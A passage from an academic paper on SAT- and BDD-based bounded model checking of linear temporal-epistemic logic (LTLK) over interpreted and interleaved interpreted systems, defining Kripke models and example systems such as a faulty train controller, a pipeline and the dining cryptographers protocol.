for temporal-epistemic-deontic logics   SAT-BMC BDD-BMC NOT BMC CTLK VerICS/IIS, MCK/IS MCMAS/IS MCMAS/IS, MCK/IS CTLKD VerICS/IIS   MCMAS/IS LTLK VerICS/IS+IIS VerICS/IS+IIS MCK/IS \(\text {CTL}^{*}\text {K}\) MCK/IS   MCK/IS RTCTLK VerICS/IIS VerICS/IIS   RTCTLKD VerICS/IIS    The BMC methods are defined for the existential fragments of the mentioned logics Table 2 Summary of the BMC techniques for temporal-epistemic-deontic logics   SAT-BMC BDD-BMC   IIS IS IIS IS ELTLK [42]   [33] [34] ECTLK [29] [41]\(^\mathrm{a}\), [23] [26]   ECTLKD   [49]\(^\mathrm{a}\)    RTECTLK [53]   [37]   RTECTLKD [51]     TECTLK [32]     EMTLKD [52]     \(^\mathrm{a}\) we denote the BMC methods that have not been implemented ` This paper combines and refines our preliminary results published in informal proceedings of two workshops: the CS&P’2011 [33] and the LAM’2012 [34], in the conference paper [36], and in the journal [42]. More precisely, for the interleaved interpreted systems and for the ELTLK properties we present a BDD-based BMC technique and an improved SAT-based BMC method that previously appeared in, respectively, [33, 36] and [36, 42]. For the interpreted systems and for the ELTLK properties we present a BDD-based BMC technique that previously appeared in [34]. Both the SAT-based BMC method are based on the SAT-based BMC technique for \(\mathrm{ECTL}^{*}\) that was introduced in [55]. 2 Preliminaries In this section we introduce the basic definitions used in the paper. In particular, we define interpreted and interleaved interpreted systems, and syntax and semantics of linear temporal logic extended with the epistemic component (LTLK) and its two subsets ELTLK and LTL. 2.1 Interpreted systems The semantics of interpreted systems (IS) provides a setting to reason about multi-agent systems (MASs) by means of specifications based on knowledge and linear or branching time. We report here the basic setting as popularised in [16]. We begin by assuming that a MAS is composed of \(n\) agents (by \({\mathcal{A }}=\{1,\ldots ,n\}\) we denote the non-empty set of agents) and a special agent \({e}\) which is used to model the environment in which the agents operate. We associate a set of possible local states\(L_{{ c}}\) and actions\(Act_{{ c}}\) to each agent \({ c}\in {\mathcal{A }} \cup \{{e}\}\). For any agent \({{ c}}\in {\mathcal{A }} \cup \{{e}\}\) we assume that the special action \(\epsilon _{{ c}}\), called the “null” action of agent \({{ c}}\), belongs to \(Act_{{ c}}\). For convenience, the symbol \(Act\) denotes the Cartesian product of the agents’ actions, i.e. \(Act = Act_1\times \dots \times Act_n \times Act_{{e}}\). An element \(a \in Act\) is a tuple of actions (one for each agent) and is referred to as a joint action. Following closely the interpreted system model, we consider a local protocol modelling the program the agent is executing. Formally, for any agent \({{ c}}\in {\mathcal{A }} \cup \{{e}\}\), the actions of the agents are selected according to a local protocol function \(P_{{ c}}: L_{{ c}} \rightarrow 2^{Act_{{ c}}}\), which maps local states to sets of possible actions for agent \({ c}\). Further, for each agent \({{ c}}\) we define a (partial) evolution function \(t_{{ c}}: L_{{ c}} \times Act \rightarrow L_{{ c}}\). We assume that if \(\epsilon _{{ c}} \in P_{{ c}}(\ell )\), then \(t_{{ c}}(\ell ,(a_1,\ldots ,a_n,a_{{e}})) = \ell \) for \(a_{{ c}}=\epsilon _{{ c}}\) and \(a_i \in Act_i\) for \(1 {\,\leqslant \,}i {\,\leqslant \,}n\), and \(a_{{e}} \in Act_{{e}}\). A global state\(g = (\ell _1, \dots , \ell _n, \ell _{{e}})\) is a tuple of local states for all the agents in the MAS corresponding to an instantaneous snapshot of the system at a given time. Given a global state \(g=(\ell _1,\dots , \ell _n, \ell _{{e}})\), we denote by \(l_{{ c}}(g)=\ell _{{ c}}\) the local component of agent \({{ c}} \in {\mathcal{A }}\cup \{{e}\}\) in \(g\). Let \(G\) be a set of global states. For a given set of agents \(\mathcal{A }\), the environment \({e}\), and a set of propositional variables \(\mathcal{PV }\), which can be either true or false, an interpreted system is a tuple $$\begin{aligned} \text {IS}=(\iota , \{L_{{ c}}, Act_{{ c}},P_{{ c}},t_{{ c}}\}_{{{ c}}\in {\mathcal{A }} \cup \{{e}\}},\mathcal{V }) \end{aligned}$$ where \(\iota \in G\) is the initial global state, and \({\mathcal{V }}: G \rightarrow 2^{\mathcal{PV }}\) is a valuation function. Given the notions above we can now define formally the global (partial) evolution function. Namely, the global (partial) evolution function \(t: G \times Act \rightarrow G\) is defined as follows: \(t(g,a)= g'\) iff for all \({ c}\in {\mathcal{A }},\,t_{{ c}}(l_{{ c}}(g),a) = l_{{ c}}(g')\) and \(t_{{e}} (l_{{e}}(g), a) = l_{{e}}(g')\). In brief we write the above as \(g \stackrel{a}{\longrightarrow } g'\). With each IS we associate a Kripke model, which is a tuple $$\begin{aligned} M=(G,\iota ,T,\{\sim _{{ c}}\}_{{{ c}} \in \mathcal{A }},\mathcal{V }) \end{aligned}$$ where \(G=\prod _{{ c}=1}^n L_{{ c}}\times L_{{e}}\) is a set of the global states, \(\iota \in G\) is the initial (global) state, \(T \subseteq G \times G\) is a global transition relation on \(G\) defined by: \((g , g') \in T\) iff there exists an action \(a \in Act\) such that \(g \stackrel{a}{\longrightarrow } g'\). We assume that the relation is total, i.e., for any \(g\in G\) there exists an \(a \in Act\) such that \(g \stackrel{a}{\longrightarrow } g'\) for some \(g' \in G\), \(\sim _{{ c}} \subseteq G \times G\) is an epistemic indistinguishability relation for each agent \({{ c}}\in \mathcal{A }\), defined by \(g \sim _{{ c}} r\) if \(l_{{ c}}(g) = l_{{ c}}(r)\), and \({\mathcal{V }}: G \rightarrow 2^{\mathcal{PV }}\) is the valuation function of IS. 2.2 Interleaved interpreted systems Interleaved interpreted systems (IIS) [31] are a restriction of interpreted systems, where all the joint actions are of special form. To be more precise, we assume that if more than one agent is active at a given state, i.e., executes a non null-action, then all the active agents perform the same (shared) action in the round. Formally, for any agent \({{ c}}\in {\mathcal{A }} \cup \{{e}\}\) we assume that the special action \(\epsilon _{{ c}}\), called “null” action of agent \({{ c}}\), belongs to \(Act_{{ c}}\); as it will become clear below the local state of agent \({{ c}}\) remains the same if the null action is performed. Next, \(Act = \bigcup _{{ c}\in {\mathcal{A }}} Act_{{ c}} \cup Act_{{e}}\), and for each action \(a\), by \(Agent(a) \subseteq {\mathcal{A }}\cup \{{e}\}\) we mean all the agents \({ c}\) such that \(a \in Act_{{ c}}\), i.e., the set of agents potentially able to perform \(a\). Further, for each agent \({{ c}} \in {\mathcal{A }}\cup \{{e}\}\), the actions are selected according to a local protocol function \(P_{{ c}}: L_{{ c}} \rightarrow 2^{Act_{{ c}}}\) such that \(\epsilon _{{ c}} \in P_{{ c}}(\ell )\), for any \(\ell \in L_{{ c}}\), i.e., we insist on the null action to be enabled at every local state. Next, for each agent \({{ c}} \in {\mathcal{A }}\cup \{{e}\}\), we define a (partial) evolution function \(t_{{ c}}: L_{{ c}} \times Act_{{ c}} \rightarrow L_{{ c}}\), where \(t_{{ c}}(\ell ,\epsilon _{{ c}}) = \ell \) for each \(\ell \in L_{{ c}}\). The local evolution function considered here differs from the standard treatment in interpreted systems by having the local action as the parameter instead of the joint action. Let \(G\) be a set of global states. For a given set of agents \(\mathcal{A }\), the environment \({e}\), and a set of propositional variables \(\mathcal{PV }\), which can be either true or false, an interleaved interpreted system is a tuple $$\begin{aligned} \text {IIS}=(\iota , \{L_{{ c}}, Act_{{ c}},P_{{ c}},t_{{ c}}\}_{{{ c}}\in {\mathcal{A }}\cup \{{e}\}},\mathcal{V }) \end{aligned}$$ where \(\iota \in G\) is the initial global state, and \({\mathcal{V }}: G \rightarrow 2^{\mathcal{PV }}\) is a valuation function. Given the notions above we can now define formally the global (partial) interleaved evolution function. Namely, the global (partial) interleaved evolution function \(t: G\times \prod _{{{ c}} = 1}^n Act_{{ c}} \times Act_{{e}} \rightarrow G\) is defined as follows: \(t(g,a_1,\dots , a_n, a_{{e}})= g'\) iff there exists an action \(a \in Act \setminus \{\epsilon _1,\ldots ,\epsilon _n, \epsilon _{{e}}\}\) such that for all \({{ c}} \in Agent(a),\,a_{{ c}} = a\) and \(t_{{ c}}(l_{{ c}}(g),a) = l_{{ c}}(g')\), and for all \({{ c}} \in ({\mathcal{A }} \cup \{{e}\}) \setminus Agent(a),\,a_{{ c}} = \epsilon _{{ c}}\) and \(t_{{ c}}(l_{{ c}}(g),\epsilon _{{ c}}) = l_{{ c}}(g)\). In brief we write the above as \(g \stackrel{a}{\longrightarrow } g'\). Similar to blocking synchronisation in automata, the above insists on all agents performing the same non-epsilon action in a global transition; additionally, note that if an agent has the action being performed in its repertoire, it must be performed, for the global transition to be allowed. This assumes that the local protocols are defined to permit this; if a local protocol does not allow it, then the local action cannot be performed and therefore the global transition does not comply with the global interleaved evolution function as defined above. With each IIS we associate a Kripke model, which is a tuple $$\begin{aligned} M=(G,\iota ,T,\{\sim _{{ c}}\}_{{{ c}} \in \mathcal{A }},\mathcal{V }) \end{aligned}$$ where \(G=\prod _{{ c}=1}^n L_{{ c}} \times L_{{e}}\) is a set of the global states, \(\iota \in G\) is the initial (global) state, \(T \subseteq G \times G\) is a global (interleaved) transition relation on \(G\) defined by: \((g , g') \in T\) iff there exists an action \(a \in Act \setminus \{\epsilon _1,\ldots ,\epsilon _n,\epsilon _{{e}}\}\) such that \(g \stackrel{a}{\longrightarrow } g'\). We assume that the relation is total, i.e., for any \(g\in G\) there exists an \(a \in Act \setminus \{\epsilon _1,\ldots ,\epsilon _n,\epsilon _{{e}}\}\) such that \(g \stackrel{a}{\longrightarrow } g'\) for some \(g' \in G\), \(\sim _{{ c}}\; \subseteq G \times G\) is an epistemic indistinguishability relation for each agent \({{ c}}\in \mathcal{A }\), defined by \(g \sim _{{ c}} r\) if \(l_{{ c}}(g) = l_{{ c}}(r)\), and \({\mathcal{V }}: G \rightarrow 2^{\mathcal{PV }}\) is the valuation function of IIS. 2.3 Runs and paths Let \(M\) be a model generated by either IS or IIS. Then, an infinite sequence of global states \(\rho =g_0 g_1 g_2\dots \) is called a run originating at \(g_0\) if there is a sequence of transitions from \(g_0\) onwards, such that, \((g_i , g_{i+1})\in T \) for every \(i {\,\geqslant \,}0\). The \(m\)-th prefix of \(\rho \), denoted by \(\rho [..m]\), is defined as \(\rho [..m] = (g_0, g_1 ,\ldots , g_m)\). Any finite prefix of a run is called a path. By \(length(\rho )\) we mean the number of the states of \(\rho \) if \(\rho \) is a path, and \(\omega \) if \(\rho \) is a run. In order to limit the indices range of \(\rho \), which can be either a path or a run, we define the relation \(\unlhd _\rho \). Let \(\unlhd _\rho \stackrel{def}{=}<\) if \(\rho \) is a run, and \(\unlhd _\rho \stackrel{def}{=}{\,\leqslant \,}\) if \(\rho \) is a path. The set of all the paths and runs originating from \(g\) is denoted by \(\varPi (g)\). The set of all the paths and runs originating from all states in \(G\) is defined as \(\varPi = \bigcup _{g \in G} \varPi (g)\). The set of all the runs originating from \(g\) is denoted by \(\varPi ^\omega (g)\). The set of all the runs originating from all states in \(G\) is defined as \(\varPi ^\omega = \bigcup _{g \in G} \varPi ^\omega (g)\). A state \(g\) is reachable from \(g_0\) if there is a path \(\rho =g_0 g_1 g_2 \ldots g_n\) for \(n {\,\geqslant \,}0\) such that \(g = g_n\). 2.4 Examples of MASs and their models In the section we present MASs modelled by means of interpreted systems and interleaved interpreted systems. We use the systems to appraise the bounded model checking methods considered in the paper. In what follows we denote by \(\overline{\epsilon }\) the joint null action, i.e., the action composed of the null actions only. 2.4.1 A faulty train controller system (FTC) The FTC (adapted from [21]) consists of a controller, and \(n\) trains (for \(n{\,\geqslant \,}2\)), one of which is dysfunctional. It is assumed that each train uses its own circular track for travelling in one direction. At one point, all trains have to pass through a tunnel, but because there is only one track in the tunnel, trains arriving from each direction cannot use it simultaneously. There are signals on both sides of the tunnel, which can be either red or green. All trains except one with a faulty signalling system notify the controller when they request entry to the tunnel or when they leave the tunnel. The controller controls the colour of the displayed signal. Figure 1 shows the local states, the possible actions, and the protocol for each agent. Null actions are omitted in the figure. Further, we assume that the local state \(Away_i\) is initial for Train \(i\), and the local state \(Green\) is initial for Controller. Fig. 1 The FTC system In the model we assume the following set of proposition variables: \({\mathcal{PV }}\!=\!\{ InTunnel_1,\ldots , InTunnel_n \}\) with the following interpretation: \((M,g)\ \models InTunnel_i\) if \(l_{Train_i}(g)= Tunnel_i\)\(i\) for all \(i \in \{1,\ldots ,n\}\). Let \(state\) denote a local state of an agent, \(Act=Act_{Train_1}\times \cdots \times Act_{Train_n} \times Act_{Controller}\) with \(Act_{Train_i} = \{approach_i,\)\( in_i, out_i, \epsilon _i\}\) where \(1{\,\leqslant \,}i {\,\leqslant \,}n\), and \(Act_{Controller} = \bigcup _{i=1}^{n-1} \{in_i, out_i\} \cup \{\epsilon \}\). Moreover, let \(a \in Act,\,act_i(a)\) denote an action of Train \(i\), and \(act_C(a)\) denote an action of Controller. In the IS model of the system we assume the following local evolution functions: • Let \(1{\,\leqslant \,}i {\,\leqslant \,}n\). The local evolution function for Train \(i\) is defined as follows: • \(t_{Train_i}(state,a) = state\) if \(a \ne {\overline{\epsilon }}\) and \(act_i(a)=\epsilon _i\) • \(t_{Train_i}(Away_i,a) = Wait_i\) if \(act_i(a)=approach_i\) • \(t_{Train_i}(Wait_i,a) = Tunnel_i\) if \(act_i(a)=in_i\) and \(act_C(a)=in_i\) and \(i\ne n\) • \(t_{Train_i}(Tunnel_i,a) = Away_i\) if \(act_i(a)=out_i\) and \(act_C(a)=out_i\) and \(i\ne n\) • \(t_{Train_n}(Wait_n,a) = Tunnel_n\) if \(act_n(a)=in_n\) • \(t_{Train_n}(Tunnel_n,a) = Away_n\) if \(act_n(a)=out_n\) • the local evolution function for Controller is defined as follows: • \(t_{Controller}(state,a) = state\) if \(act_C(a)=\epsilon \) • \(t_{Controller}(Green,a) = Red\) if \(act_i(a)=in_i\) and \(act_C(a)=in_i\) and \(i\ne n\) • \(t_{Controller}(Red, a) = Green\)\(act_i(a)=out_i\) and \(act_C(a)=out_i\) and \(i\ne n\) In the IIS model of the system we assume the following local evolution functions: • for Train \(i,\,t_{Train_i}\) is defined as follows: • \(t_{Train_i}(state,\epsilon _i) = state\), for \(1{\,\leqslant \,}i {\,\leqslant \,}n\) • \(t_{Train_i}(Away_i,approach_i) = Wait_i\), for \(1{\,\leqslant \,}i {\,\leqslant \,}n\) • \(t_{Train_i}(Wait_n,in_n) = Tunnel_n\) • \(t_{Train_i}(Wait_i,in_i) = Tunnel_i\) if \(act_C(a)=in_i\) and \(act_j(a)=\epsilon _j\) for all \(1{\,\leqslant \,}j< n \) such that \(j\ne i\) • \(t_{Train_n}(Tunnel_n,out_n) = Away_n\) • \(t_{Train_i}(Tunnel_i,out_i) = Away_i\) if \(act_C(a)=out_i\) and \(act_j(a)=\epsilon _j\) for all \(1{\,\leqslant \,}j< n \) such that \(j\ne i\) • for Controller, \(t_{Controller}\) is defined as follows: • \(t_{Controller}(state,\epsilon ) = state\) • \(t_{Controller}(Green,in_i) = Red\) if \(act_i(a)=in_i\), for \(1{\,\leqslant \,}i < n\) • \(t_{Controller}(Red, out_i) = Green\) if \(act_i(a)=out_i\), for \(1{\,\leqslant \,}i < n\) 2.4.2 Faulty generic pipeline paradigm (FGPP) The FGPP (adapted from [40]) consists of the following agents: the Producer that is able to produce data, the Consumer that is able to receive data, a chain of \(n\) intermediate Nodes that are able to receive, process, and send data, and a chain of \(n\) Alarms that are enabled when some error occurs, i.e. the \(Hung\)-\(upi\,(1{\,\leqslant \,}i {\,\leqslant \,}n)\) operation is performed three times. If the \(Hung\)-\(upi\) action is performed only once or only twice, than the system recovers from the error. Figure 2 shows the local states, the possible actions, and the protocol for each agent. From Fig. 2 we can also deduce the local evolution function of IIS. Null actions are omitted in the figure. Further, we assume that the following local states \(ProdReady,\,NodeiReady,\,ConsReady\) and \(AlarmiReady\) are initial, respectively, for Producer, Node \(i\), Consumer, and Alarm \(i\). Fig. 2 The FGPP system. Dashed lines correspond to the system behaviour after an error has occured In the model we assume the following set of proposition variables: \({\mathcal{PV }}=\{ ProdSend, ConsReady,\,Problem_1,\,\ldots \), \(Problem_n,\,Repair_1,\,\ldots ,\,Repair_n,\,Alarm_1Send,\,\ldots ,\,Alarm_nSend \}\) with the following interpretation: • \((M,g)\models ProdSend\) if \(l_{Producer}(g)=ProdSend\) • \((M,g)\models ConsReady\) if \(l_{Consumer}(g)=ConsReady\) • \((M,g)\models Problem_i\) if \(l_{Alarm i}(g)= Problemi\), for all \(1{\,\leqslant \,}i {\,\leqslant \,}n\) • \((M,g)\models Repair_i\) if \(l_{Alarm i}(g)= Repairi\), for all \(1{\,\leqslant \,}i {\,\leqslant \,}n\) • \((M,g)\models Alarm_iSend\) if \(l_{Alarm i}(g)= AlarmiSend\), for all \(1{\,\leqslant \,}i {\,\leqslant \,}n\) Let \(state\) denote a local state of an agent, \(P,\,C,\,Ni\), and \(Ai\) denote, respectively, Producer, Consumer, the \(i\)-th Node, and the \(i\)-th Alarm. Further, let \(Act=Act_{P}\times \prod _{i=1}^n Act_{Ni}\times \prod _{i=1}^n Act_{Ai} \times Act_{C}\) with \(Act_{P} = \{Producing, Send_1, \epsilon _P\},\,Act_{C} = \{Send_{n+1}, Consuming, \epsilon _C\},\,Act_{Ni} = \{Send_i,Send_{i+1},Processing_i, Hang\_up_i, \epsilon _{Ni}\}\), and \(Act_{Ai} = \{Processing_i, Hang\_up_i, Reset_i, \epsilon _{Ai}\}\). Moreover, let \(a \in Act\), and \(act_P(a),\,act_{Ni}(a),\,act_{Ai}(a)\), and \(act_C(a)\), respectively, denote an action of Producer, Node \(i\), Alarm \(i\), and Consumer. In the IS model of the system we assume the following local evaluation functions: • \(t_P(state,a) = state\) if \(a \ne {\overline{\epsilon }}\) and \(act_P(a) = \epsilon _P\) • \(t_P(ProdReady, a) = ProdSend\) if \(act_P(a) = Producing\) • \(t_P(ProdSend, a ) = ProdReady\) if \(act_P(a) = Send_1\) and \(act_{N1}(a) = Send_1\) • \(t_C(state,a) = state\) if \(act_C(a) = \epsilon _C\) • \(t_C(ConsReady,a)=Received\) if \(act_C(a) = Send_{n+1}\) and \(act_{Nn}(a) = Send_{n+1}\) • \(t_C(Received, a)= ConsReady\) if \(act_C(a) = Consuming\) • if \(n=1\) • \(t_{N1}(state,a) = state\) if \(a \ne {\overline{\epsilon }}\) and \(act_{N1}(a) = \epsilon _{N1}\) • \(t_{N1}(Node1Ready, a) = Node1Proc\) if \(act_{N1}(a) = act_P(a) = Send_1\) • \(t_{N1}(Node1Proc, a) = Node1Send\) if \(act_{N1}(a) = act_{A1}(a) = Processing_1\) • \(t_{N1}(Node1Proc, a) = Node1Proc\) if \(act_{N1}(a) = act_{A1}(a) = Hang\_up_1\) • \(t_{N1}(Node1Send,a)=Node1Ready\) if \(act_{N1}(a) = act_{C}(a) = Send_2\) • if \(n=2\) • \(t_{N1}(state,a) = state\) if \(a \ne {\overline{\epsilon }}\) and \(act_{N1}(a) = \epsilon _{N1}\) • \(t_{N1}(Node1Ready, a) = Node1Proc\) if \(act_{N1}(a) = act_P(a) = Send_1\) • \(t_{N1}(Node1Proc, a) = Node1Send\) if \(act_{N1}(a) = act_{A1}(a) = Processing_1\) • \(t_{N1}(Node1Proc, a) = Node1Proc\) if \(act_{N1}(a) = act_{A1}(a) = Hang\_up_1\) • \(t_{N1}(Node1Send,a)=Node1Ready\) if \(act_{N1}(a) = act_{N2}(a) = Send_2\) • \(t_{N2}(state,a) = state\) if \(a \ne {\overline{\epsilon }}\) and \(act_{N2}(a) = \epsilon _{N2}\) • \(t_{N2}(Node2Ready, a) = Node2Proc\) if \(act_{N2}(a) = act_{N1}(a) = Send_2\) • \(t_{N2}(Node2Proc, a) = Node2Send\) if \(act_{N2}(a) = act_{A2}(a) = Processing_2\) • \(t_{N2}(Node2Proc, a) = Node2Proc\) if \(act_{N2}(a) = act_{A2}(a) = Hang\_up_2\) • \(t_{N2}(Node2Send,a)=Node2Ready\) if \(act_{N2}(a) = act_{C}(a) = Send_3\) • if \(n{\,\geqslant \,}3\) and \(2{\,\leqslant \,}i < n\) • \(t_{N1}(state,a) = state\) if \(a \ne {\overline{\epsilon }}\) and \(act_{N1}(a) = \epsilon _{N1}\) • \(t_{N1}(Node1Ready, a) = Node1Proc\) if \(act_{N1}(a) = act_P(a) = Send_1\) • \(t_{N1}(Node1Proc, a) = Node1Send\) if \(act_{N1}(a) = act_{A1}(a) = Processing_1\) • \(t_{N1}(Node1Proc, a) = Node1Proc\) if \(act_{N1}(a) = act_{A1}(a) = Hang\_up_1\) • \(t_{N1}(Node1Send,a)=Node1Ready\) if \(act_{N1}(a) = act_{N2}(a) = Send_2\) • \(t_{Nn}(state,a) = state\) if \(a \ne {\overline{\epsilon }}\) and \(act_{Nn}(a) = \epsilon _{Nn}\) • \(t_{Nn}(NodeNReady, a) = NodeNProc\) if \(act_{Nn}(a) = act_{Nn-1}(a) = Send_n\) • \(t_{Nn}(NodeNProc, a) = NodeNSend\) if \(act_{Nn}(a) = act_{An}(a) = Processing_n\) • \(t_{Nn}(NodeNProc, a) = NodeNProc\) if \(act_{Nn}(a) = act_{An}(a) = Hang\_up_n\) • \(t_{Nn}(NodeNSend,a)=NodeNReady\) if \(act_{Nn}(a) = act_{C}(a) = Send_{n+1}\) • \(t_{Ni}(state,a) = state\) if \(a \ne {\overline{\epsilon }}\) and \(act_{Ni}(a) = \epsilon _{Ni}\) • \(t_{Ni}(NodeNReady, a) = NodeNProc\) if \(act_{Ni}(a) = act_{Nn-1}(a) = Send_i\) • \(t_{Ni}(NodeNProc, a) = NodeNSend\) if \(act_{Ni}(a) = act_{Ai}(a) = Processing_i\) • \(t_{Ni}(NodeNProc, a) = NodeNProc\) if \(act_{Ni}(a) = act_{Ai}(a) = Hang\_up_i\) • \(t_{Ni}(NodeNSend,a)=NodeNReady\) if \(act_{Ni}(a) = act_{Ni+1}(a) = Send_{i+1}\) • Let \(1{\,\leqslant \,}i {\,\leqslant \,}n\): • \(t_{Ai}(state,a) = state\) if \(a \ne {\overline{\epsilon }}\) and \(act_{Ai}(a) = \epsilon _{Ai}\) • \(t_{Ai}(AlarmiReady,a) = Problemi\) if \(act_{Ai}(a) = act_{Ni} (a) = Hang\_up_i\) • \(t_{Ai}(AlarmiReady,a) = Repairi\) if \(act_{Ai}(a) = act_{Ni} (a) = Processing_i\) • \(t_{Ai}(Problemi,a) = Problemi'\) if \(act_{Ai}(a) = act_{Ni} (a) = Hang\_up_i\) • \(t_{Ai}(Problemi,a) = Repairi\) if \(act_{Ai}(a) = act_{Ni} (a) = Processing_i\) • \(t_{Ai}(Problemi',a) = AlarmiSend\) if \(act_{Ai}(a) = act_{Ni} (a) = Hang\_up_i\) • \(t_{Ai}(Problemi',a) = Repairi\) if \(act_{Ai}(a) = act_{Ni} (a) = Processing_i\) • \(t_{Ai} (AlarmiSend,a) = AlarmiSend\) if \(act_{Ai}(a) = act_{Ni} (a) = Hang\_up_i\) • \(t_{Ai} (Repairi,a) = AlarmiReady\) if \(act_{Ai}(a) = Reseti\). 2.4.3 Dining cryptographers (DC) The DC [10] is a scalable anonymity protocol, which has been formalised and analysed in many works, e.g., [27, 39]. Our formalisation of DC is shown in Fig. 3 and extends our earlier definition [27]. Null actions are omitted in the figure. Fig. 3 Dining cryptographers (DC) We model \(n\) cryptographers sitting at a round table, with coins between them, every coin seen by a pair of respective neighbours. Let \(state\) denote a local state of an agent. Let \(C_i\) and \(Coin_i\) denote the \(i\)-th cryptographer and \(i\)-th coin, respectively. \(Counter\) denotes the agent counting utterances and \(Oracle_i\) determines if the agent \(i\) pays, or no agent pays at all. Thus, our DC system consists of \(3n+1\) components formed by \(n\) agents and the environment. More precisely, the \(i\)-th agent consists of the following three components: \(C_i,\,Coin_i\), and \(Oracle_i\). The component \(Counter\) defines the environment. We introduce a helper function to identify the right-side neighbour of the cryptographer \(i\): \(i^+ = (i+1) \) for \( 1 {\,\leqslant \,}i < n\), and \(i^+ = 1\) for \(i = n\). The protocol works as follows: first the oracles determine who is the payer (either precisely one cryptographer or none of them). Then, every cryptographer looks at the two coins he can see (his and his right neighbour), and records the result (the states \(seeD\) and \(seeE\) correspond to seeing either different or equal coin sides, respectively). The final utterance of each cryptographer (\(sayD\) and \(sayE\) locations correspond to saying different and equal outcomes, respectively) depends of what result is seen and whether the cryptographer has paid or not. Finally, the counter counts the utterances, determining the final result of the protocol. Let \(Act=Act_{Counter}\times \prod _{i=1}^n Act_{C_i}\times \prod _{i=1}^n Act_{Coin_i} \times \prod _{i=1}^n Act_{Oracle_i}\) with • \(Act_{Counter} = \{se_1, sd_1, \cdots , se_n, sd_n, \epsilon _{Counter}\}\), • \(Act_{Coin_i} = \{tt_i, hh_i, ht_i, th_i, tt_{i^+}, hh_{i^+},ht_{i^+},th_{i^+},\epsilon _{Coin_i}\}\), • \(Act_{Oracle_i} = \{pay_0, \dots , pay_{n},t_i,h_i paid_i, not\_paid_i, \epsilon _{Oracle_i}\}\), and • \(Act_{C_i} = \{pay_0, \dots , pay_{n},tt_i, hh_i, ht_i, th_i, not\_paid_i, paid_i, se_i, sd_i, \epsilon _{C_i}\}\), for all \(1{\,\leqslant \,}i {\,\leqslant \,}n\). Moreover, let \(a \in Act\), and \(act_{Counter}(a),\,act_{C_i}(a),\,act_{Coin_i}(a)\), and \(act_{Oracle}(a)\), respectively, denote an action of Oracle, Cryptographer \(i\), Coin \(i\), and Counter. In the IS model of the system we assume the following local evolution functions (we provide definitions for \(C_i\) and \(Oracle_i\) components, the remaining ones are straightforward): • the local evolution for \(Oracle_i\) is defined as follows: • \(t_{Oracle_i}(state, a) = state\) iff \(a \ne {\overline{\epsilon }}\) and \(act_{Oracle_i}(a) =\epsilon _{Oracle_i}\) • \(t_{Oracle_i}(start, a) = tossed\) iff \(act_{Oracle_i}(a) = act_{Coin_i}(a)= t_i\) or \(act_{Oracle_i}(a) = act_{Coin_i}(a)= h_i\) • \(t_{Oracle_i}(tossed, a) = paid\) iff \(act_{Oracle_1}(a)= \ldots = act_{Oracle_n}(a) = pay_i\) and \(act_{C_1}(a)=\ldots =act_{C_n}(a) = pay_i\) • \(t_{Oracle_i}(tossed, a) = not\_paid\) iff either \(act_{Oracle_1}(a)= \ldots = act_{Oracle_n}(a) = pay_0\) and \(act_{C_1}(a)=\ldots =act_{C_n}(a) = pay_0\), or \(act_{Oracle_1}(a)=\ldots = act_{Oracle_n}(a) = pay_j\) and \(act_{C_1}(a)=\ldots =act_{C_n}(a) = pay_j\) for some \(j\) such that \(1{\,\leqslant \,}j {\,\leqslant \,}n\) and \(j \not =i\) • the local evolution for \(C_i\) is defined as follows: • \(t_{C_i}(state, a) = state\) iff \(a \ne {\overline{\epsilon }}\) and \(act_{C_i}(a)=\epsilon _{C_i}\) • \(t_{C_i}(start, a) = decided\) iff \(act_{Oracle_1}(a)=\ldots = act_{Oracle_n}(a) = pay_j\) and \(act_{C_1}(a)=\ldots =act_{C_n}(a) = pay_j\) for some \(j\) such that \(0{\,\leqslant \,}j {\,\leqslant \,}n\) • \(t_{C_i}(decided, a) = {seeD}\) iff \(act_{C_i}(a) = act_{Coin_i}(a) = act_{Coin_{i^+}}(a) = th_i\) • \(t_{C_i}(decided, a) = {seeD}\) iff \(act_{C_i}(a) = act_{Coin_i}(a) = act_{Coin_{i^+}}(a) = ht_i\) • \(t_{C_i}(decided, a) = {seeE}\) iff \(act_{C_i}(a) = act_{Coin_i}(a) = act_{Coin_{i^+}}(a) = hh_i\) • \(t_{C_i}(decided, a) = {seeE}\) iff \(act_{C_i}(a) = act_{Coin_i}(a) = act_{Coin_{i^+}}(a) = tt_i\) • \(t_{C_i}(seeE, a) = {sayD}\) iff \(act_{C_i}(a) = act_{Oracle_i}(a) = paid_i\) • \(t_{C_i}(seeD, a) = {sayE}\) iff \(act_{C_i}(a) = act_{Oracle_i}(a) = paid_i\) • \(t_{C_i}(seeD, a) = {sayD}\) iff \(act_{C_i}(a) = act_{Oracle_i}(a) = not\_paid_i\) • \(t_{C_i}(seeE, a) = {sayE}\) iff \(act_{C_i}(a) = act_{Oracle_i}(a) = not\_paid_i\) Because of the way in which the local evolution functions are defined obtaining the global evolution function for IIS requires only that the components not mentioned in every of the above definitions, execute their respective \(\epsilon \) actions. For example, because we provide separate actions for every payment configuration, there is no need to enforce any additional conditions at the global level. In the model we assume the following set of propositional variables: \({\mathcal{PV }}=\{ odd, paid_1, \ldots paid_n \}\) with the following interpretation: • \((M,g)\models odd\) if \(l_{Counter}(g)= odd\), • \((M,g)\models paid_i\) if \(l_{Oracle_i}(g)= paid\), for all \(1{\,\leqslant \,}i {\,\leqslant \,}n\). 2.5 LTLKand its two subsets: ELTLKand LTL Combinations of linear time with knowledge have long been used in the analysis of temporal epistemic properties of multi-agent systems [16]. We now recall the basic definitions and adapt them to our purposes when needed. 2.5.1 Syntax Let \(\mathcal{PV }\) be a set of propositional variables to be interpreted over the global states of a system, \(p \in \mathcal{PV }\), and \({\varGamma } \subseteq \mathcal{A }\). The LTLK formulae in the negation normal form are given by the following grammar: $$\begin{aligned}&\varphi :{:=} {{true}}\mid {false}\mid p\, \mid \, \lnot p\,\mid \, \varphi \wedge \varphi \,\mid \, \varphi \vee \varphi \,\mid \, \mathrm{X}\varphi \, \mid \, \varphi \mathrm{U}\varphi \,\mid \, \varphi \mathrm{R}\varphi \,\mid \\&\quad \quad \mathrm{{K}}_{{ c}}\varphi \,\mid \, {\overline{\mathrm{{K}}}}_{{ c}}\varphi \,\mid \, \mathrm{E}_{\varGamma }\varphi \,\mid \, {\overline{\mathrm{E}}}_{\varGamma }\varphi \,\mid \, \mathrm{{D}}_{\varGamma }\varphi \,\mid \, {\overline{\mathrm{{D}}}}_{\varGamma }\varphi \,\mid \, \mathrm{{C}}_{\varGamma }\varphi \,\mid \, {\overline{\mathrm{{C}}}}_{\varGamma }\varphi . \end{aligned}$$ The temporal modalities 